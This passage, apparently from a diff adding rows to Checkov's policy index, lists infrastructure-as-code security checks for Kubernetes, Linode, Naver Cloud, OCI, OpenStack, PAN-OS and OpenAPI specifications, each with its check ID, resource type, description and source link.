| ClusterRole | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | +| 3564 | CKV2_K8S_5 | resource | ClusterRoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | +| 3565 | CKV2_K8S_5 | resource | Role | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | +| 3566 | CKV2_K8S_5 | resource | RoleBinding | No ServiceAccount/Node should be able to read all secrets | Kubernetes | [ReadAllSecrets.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ReadAllSecrets.yaml) | +| 3567 | CKV2_K8S_6 | resource | Deployment | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) | +| 3568 | CKV2_K8S_6 | resource | Pod | Minimize the admission of pods which lack an associated NetworkPolicy | Kubernetes | [RequireAllPodsToHaveNetworkPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RequireAllPodsToHaveNetworkPolicy.yaml) | +| 3569 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) | +| 3570 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) | +| 3571 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) | +| 3572 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) | +| 3573 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) | +| 3574 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) | +| 3575 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) | +| 3576 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | +| 3577 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | +| 3578 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) | +| 3579 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) | +| 3580 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) | +| 3581 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) | +| 3582 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. | Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) | +| 3583 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) | +| 3584 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) | +| 3585 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) | +| 3586 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) | +| 3587 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. | Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) | +| 3588 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) | +| 3589 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) | +| 3590 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) | +| 3591 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) | +| 3592 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | +| 3593 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | +| 3594 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) | +| 3595 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) | +| 3596 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) | +| 3597 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | +| 3598 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | +| 3599 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. | Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) | +| 3600 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) | +| 3601 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) | +| 3602 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) | +| 3603 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) | +| 3604 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) | +| 3605 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) | +| 3606 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | [InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) | +| 3607 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) | +| 3608 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) | +| 3609 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) | +| 3610 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) | +| 3611 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) | +| 3612 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) | +| 3613 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | [IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) | +| 3614 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) | +| 3615 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) | +| 3616 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) | +| 3617 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) | +| 3618 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) | +| 3619 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) | +| 3620 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) | +| 3621 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) | +| 3622 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) | +| 3623 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) | +| 3624 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) | +| 3625 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 3626 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 3627 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 3628 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) | +| 3629 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) | +| 3630 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) | +| 3631 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) | +| 3632 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) | +| 3633 | CKV_OPENAPI_1 | resource | securityDefinitions | Ensure that securityDefinitions is defined and not empty - version 2.0 files | OpenAPI | [SecurityDefinitions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitions.py) | +| 3634 | CKV_OPENAPI_2 | resource | security | Ensure that if the security scheme is not of type 'oauth2', the array value must be empty - version 2.0 files | OpenAPI | [Oauth2SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py) | +| 3635 | CKV_OPENAPI_3 | resource | components | Ensure that security schemes don't allow cleartext credentials over unencrypted channel - version 3.x.y files | OpenAPI | [CleartextOverUnencryptedChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py) | +| 3636 | CKV_OPENAPI_4 | resource | security | Ensure that the global security field has rules defined | OpenAPI | [GlobalSecurityFieldIsEmpty.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py) | +| 3637 | CKV_OPENAPI_5 | resource | security | Ensure that security operations is not empty. | OpenAPI | [SecurityOperations.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/SecurityOperations.py) | +| 3638 | CKV_OPENAPI_6 | resource | security | Ensure that security requirement defined in securityDefinitions - version 2.0 files | OpenAPI | [SecurityRequirement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityRequirement.py) | +| 3639 | CKV_OPENAPI_7 | resource | security | Ensure that the path scheme does not support unencrypted HTTP connection where all transmissions are open to interception- version 2.0 files | OpenAPI | [PathSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/PathSchemeDefineHTTP.py) | +| 3640 | CKV_OPENAPI_8 | resource | security | Ensure that security is not using 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2SecurityPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityPasswordFlow.py) | +| 3641 | CKV_OPENAPI_9 | resource | paths | Ensure that security scopes of operations are defined in securityDefinitions - version 2.0 files | OpenAPI | [OperationObjectSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectSecurityScopeUndefined.py) | +| 3642 | CKV_OPENAPI_10 | resource | paths | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2OperationObjectPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2OperationObjectPasswordFlow.py) | +| 3643 | CKV_OPENAPI_11 | resource | securityDefinitions | Ensure that operation object does not use 'password' flow in OAuth2 authentication - version 2.0 files | OpenAPI | [Oauth2SecurityDefinitionPasswordFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionPasswordFlow.py) | +| 3644 | CKV_OPENAPI_12 | resource | securityDefinitions | Ensure no security definition is using implicit flow on OAuth2, which is deprecated - version 2.0 files | OpenAPI | [Oauth2SecurityDefinitionImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/Oauth2SecurityDefinitionImplicitFlow.py) | +| 3645 | CKV_OPENAPI_13 | resource | securityDefinitions | Ensure security definitions do not use basic auth - version 2.0 files | OpenAPI | [SecurityDefinitionBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/SecurityDefinitionBasicAuth.py) | +| 3646 | CKV_OPENAPI_14 | resource | paths | Ensure that operation objects do not use 'implicit' flow, which is deprecated - version 2.0 files | OpenAPI | [OperationObjectImplicitFlow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectImplicitFlow.py) | +| 3647 | CKV_OPENAPI_15 | resource | paths | Ensure that operation objects do not use basic auth - version 2.0 files | OpenAPI | [OperationObjectBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectBasicAuth.py) | +| 3648 | CKV_OPENAPI_16 | resource | paths | Ensure that operation objects have 'produces' field defined for GET operations - version 2.0 files | OpenAPI | [OperationObjectProducesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectProducesUndefined.py) | +| 3649 | CKV_OPENAPI_17 | resource | paths | Ensure that operation objects have 'consumes' field defined for PUT, POST and PATCH operations - version 2.0 files | OpenAPI | [OperationObjectConsumesUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/OperationObjectConsumesUndefined.py) | +| 3650 | CKV_OPENAPI_18 | resource | schemes | Ensure that global schemes use 'https' protocol instead of 'http'- version 2.0 files | OpenAPI | [GlobalSchemeDefineHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSchemeDefineHTTP.py) | +| 3651 | CKV_OPENAPI_19 | resource | security | Ensure that global security scope is defined in securityDefinitions - version 2.0 files | OpenAPI | [GlobalSecurityScopeUndefined.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v2/GlobalSecurityScopeUndefined.py) | +| 3652 | CKV_OPENAPI_20 | resource | paths | Ensure that API keys are not sent over cleartext | OpenAPI | [ClearTextAPIKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/ClearTextAPIKey.py) | +| 3653 | CKV_OPENAPI_21 | resource | paths | Ensure that arrays have a maximum number of items | OpenAPI | [NoMaximumNumberItems.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/generic/NoMaximumNumberItems.py) | +| 3654 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) | +| 3655 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | +| 3656 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | +| 3657 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | +| 3658 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) | +| 3659 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) | +| 3660 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) | +| 3661 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) | +| 3662 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) | +| 3663 | CKV_PAN_2 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoHTTP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoHTTP.yaml) | +| 3664 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) | +| 3665 | CKV_PAN_3 | resource | tasks.paloaltonetworks.panos.panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Ansible | [PanosInterfaceMgmtProfileNoTelnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosInterfaceMgmtProfileNoTelnet.yaml) | +| 3666 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | +| 3667 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) | +| 3668 | CKV_PAN_4 | resource | tasks.paloaltonetworks.panos.panos_security_rule | Ensure DSRI is not enabled within security policies | Ansible | [PanosPolicyNoDSRI.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/graph_checks/PanosPolicyNoDSRI.yaml) | +| 3669 | CKV_PAN_5 | resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | +| 3670 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | 